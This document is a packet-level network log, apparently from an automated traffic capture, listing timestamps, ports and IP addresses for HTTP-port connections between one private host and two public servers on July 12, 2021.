Jul 12, 2021 10:28:45.966959000 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.966970921 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.966980934 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.967005968 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.967030048 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.967051029 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.967062950 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.967540026 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.967752934 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.967933893 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.968579054 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.968714952 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.968774080 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.969857931 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.969939947 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.970004082 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.979449034 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.979520082 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.979592085 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.980940104 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.980973959 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.981056929 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.981097937 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.981261969 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.981319904 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.981872082 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.982074976 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.982134104 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.982729912 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.982789993 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.982855082 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.983700991 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.983731031 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.983781099 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.984303951 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.984467030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.984530926 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.985080957 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.985106945 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.985161066 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.985794067 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.986004114 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.986058950 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.986200094 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.986262083 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.986284971 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.986329079 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.987029076 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.987052917 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.987095118 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.987155914 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.987307072 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.987447023 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.989938974 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.989978075 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.990000010 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.990014076 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.990041018 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.990058899 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.990083933 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.990108967 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.990133047 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.990156889 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.990171909 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.990195036 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.990216970 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.990228891 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.990250111 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.990264893 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.990286112 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.990302086 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.990322113 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.990349054 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.990474939 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.990551949 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.990578890 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.991524935 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.991553068 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.991570950 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.991605043 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.991627932 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.991667986 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.992506027 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.992537975 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.992594004 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:45.992621899 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.992649078 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:45.992713928 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.005878925 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.005916119 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.005939007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.005961895 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.005983114 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.006011009 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.006021976 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.006050110 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.006061077 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.006083012 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.006107092 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.006118059 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.006143093 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.006165981 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.006177902 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.006198883 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.006221056 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.006232977 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.006254911 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.006272078 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.006283045 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.006304026 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.006326914 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.006335020 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.006356001 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.006380081 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.006386995 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.006433964 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.007586002 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.007620096 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.007643938 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.007663965 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.007714987 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.007767916 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.007813931 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.007838011 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.007862091 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.007885933 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.010309935 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.010348082 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.010397911 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.010425091 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.010463953 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.010478973 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.010499001 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.010520935 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.010549068 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.011322021 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.011347055 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.011377096 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.011389971 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.011415958 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.011426926 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.011449099 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.011508942 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.012130976 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.012156010 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.012181044 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.012218952 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.012356997 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.012382030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.012422085 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.012461901 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.012518883 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.012557983 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.013205051 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.013231993 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.013253927 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.013278008 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.013293982 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.013355970 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.014936924 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.014982939 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.015065908 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.035445929 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.040191889 CEST	80	49718	47.75.19.154	192.168.2.3
Jul 12, 2021 10:28:46.054462910 CEST	80	49718	47.75.19.154	192.168.2.3
Jul 12, 2021 10:28:46.054502964 CEST	80	49718	47.75.19.154	192.168.2.3
Jul 12, 2021 10:28:46.054527998 CEST	80	49718	47.75.19.154	192.168.2.3
Jul 12, 2021 10:28:46.054548979 CEST	80	49718	47.75.19.154	192.168.2.3
Jul 12, 2021 10:28:46.054573059 CEST	80	49718	47.75.19.154	192.168.2.3
Jul 12, 2021 10:28:46.054591894 CEST	80	49718	47.75.19.154	192.168.2.3
Jul 12, 2021 10:28:46.054606915 CEST	80	49718	47.75.19.154	192.168.2.3
Jul 12, 2021 10:28:46.054615974 CEST	49718	80	192.168.2.3	47.75.19.154
Jul 12, 2021 10:28:46.054677963 CEST	49718	80	192.168.2.3	47.75.19.154
Jul 12, 2021 10:28:46.055196047 CEST	49718	80	192.168.2.3	47.75.19.154
Jul 12, 2021 10:28:46.057688951 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.057732105 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.057758093 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.057780027 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.057806969 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.057840109 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.057878971 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.057920933 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.057940960 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.058551073 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.058638096 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.058871031 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.058898926 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.058922052 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.058943987 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.058957100 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.058978081 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.058990002 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.059622049 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.059654951 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.059680939 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.059695959 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.059719086 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.059739113 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.059756041 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.059778929 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.059808969 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.059815884 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.059864044 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.060544014 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.060580969 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.060605049 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.060628891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.060657024 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.060667038 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.060688019 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.060702085 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.060762882 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.061238050 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.061628103 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.061651945 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.061677933 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.061700106 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.061722040 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.061743975 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.061794996 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.061882973 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.062331915 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.062357903 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.062381983 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.062421083 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.062441111 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.062464952 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.062488079 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.063287020 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.063318968 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.063343048 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.063370943 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.063384056 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.063400984 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.063416958 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.063441992 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.063473940 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.064003944 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.064028978 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.064054012 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.064070940 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.064091921 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.064121008 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.064131975 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.064152956 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.064182997 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.064834118 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.064858913 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.064898014 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.077843904 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.077970982 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.078562021 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.078592062 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.078615904 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.078645945 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.078655958 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.078697920 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.079010010 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.079467058 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.079652071 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.079675913 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.079701900 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.079721928 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.079737902 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.079751015 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.080059052 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.080117941 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.080303907 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.080622911 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.080646038 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.081918001 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.081981897 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.082005978 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.082031012 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.082053900 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.082078934 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.082091093 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.082103014 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.082124949 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.082149029 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.082156897 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.082182884 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.082206011 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.082218885 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.082241058 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.082263947 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.082277060 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.082299948 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.082340002 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.082755089 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.082773924 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.082815886 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.098920107 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.098958015 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.098978996 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.099000931 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.099016905 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.099045038 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.099055052 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.099092007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.099132061 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.099819899 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.099843979 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.099869967 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.099894047 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.099911928 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.099926949 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.099942923 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.099961996 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.099982977 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.100030899 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.100056887 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.100085974 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.100845098 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.100929022 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.100976944 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.100999117 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.101042986 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.101061106 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.101089001 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.101113081 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.101138115 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.101838112 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.101870060 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.101896048 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.101918936 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.101932049 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.101949930 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.101964951 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.101990938 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.102062941 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.102510929 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.102566957 CEST	49720	80	192.168.2.3	47.254.186.176
